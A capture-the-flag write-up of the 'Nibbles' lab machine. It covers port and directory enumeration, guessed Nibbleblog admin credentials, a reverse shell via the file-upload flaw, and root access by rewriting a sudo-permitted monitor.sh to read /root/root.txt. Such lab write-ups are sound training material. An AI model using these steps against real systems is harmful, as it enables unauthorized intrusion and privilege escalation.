Nibbles

OS: Linux, Difficulty: Easy, IP: 10.10.10.75

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 7 12:18:27 2019 as: nmap -sV -sC -O -A -p 22,80 -oN O-detailed 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 250.62 ms 10.10.14.1
2 247.36 ms 10.10.10.75
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 7 12:18:51 2019 -- 1 IP address (1 host up) scanned in 24.98 seconds
Home Page. Nothing too exciting.
Source code: Pointing to a directory.

Just to be sure I ran gobuster on both the root directory as well as on the nibbleblog directory.

root directory
/server-status (Status: 403)
nibbleblog directory
/content (Status: 301)
/themes (Status: 301)
/admin (Status: 301)
/plugins (Status: 301)
/README (Status: 200)
/languages (Status: 301)

All the directories had some juicy information however the most interesting one, was the admin. So I jumped over to admin.

/admin/. Not interesting, I tried admin.php next.
Admin Page
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog 3 - Multiple SQL Injections | exploits/php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
-------------------------------------------------------------------------------------------------------------- ----------------------------------------

Did a searchsploit and found a Arbitrary file upload vulnerability. However it was a metsaploit module, so for my OSCP spirit, I went ahead and searched the internet to learn to exploit this vulnerability manually. However, the vulnerability required admin credentials, which even after enumerating I was not able to harvest from the website or it's source code, so they were to be guessed.

Credentials were: admin:nibbles

Followed the exact steps with the https://github.com/pentestmonkey/php-reverse-shell Shell and got myself shell as nibbler user.

listening on [any] 9999 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.75] 39186
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
03:16:12 up 35 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

User Own

$ cat /home/nibbler/user.txt
b02ff***

Root Own

$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

As per sudo -l I can run the mentioned script as root without any password, however, the interesting part to note in this output is sudo: unable to resolve host Nibbles: Connection timed out. This means when I'll try to run sudo I won't be able to execute anything successfully as the hostname and the hosts files are messed up.

Had to google around to finally reach to a promising solution which did not require to modify /etc/hosts or /etc/hostname files, which apparently I just can not as I am low privileged user on the box.

This helped me resolve the issue.

$ sudo -h 127.0.0.1 -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

No more error message this means now I can run the script, however before that we'll have to modify the script to get root flag.

As evident from the directory listing, there was no script or the folder as in the sudo description, however, there was a zip file named personal.zip. I unzipped the file to get the exact same structure as the one specified in the sudo. All I had to do was replace the original monitor.sh with my modified version and run.

Modified monitor.sh in /home/nibbler/personal/stuff/monitor.sh
#! /bin/bash
cat /root/root.txt > /tmp/root
[email protected]:/home/nibbler/personal/stuff$ sudo -h 127.0.0.1 /home/nibbler/personal/stuff/monitor.sh
[email protected]:/home/nibbler/personal/stuff$ cd /tmp
[email protected]:/tmp$ ls -l
total 12
-rw-r--r-- 1 root root 33 Jul 7 03:26 root
drwx------ 3 root root 4096 Jul 7 02:40 systemd-private-a84379fcac92492c830c351c228addd0-systemd-timesyncd.service-XsPwpn
drwx------ 2 root root 4096 Jul 7 02:40 vmware-root
[email protected]:/tmp$ cat root
b6d74***

Learning Outcome

Learned a little more about how sudo can be manipulated if some settings are not working fine. Learned about how to exploit NibbleBlog 4.0.3, which was relatively easy. I am very bad, like really bad, at credentials guessing.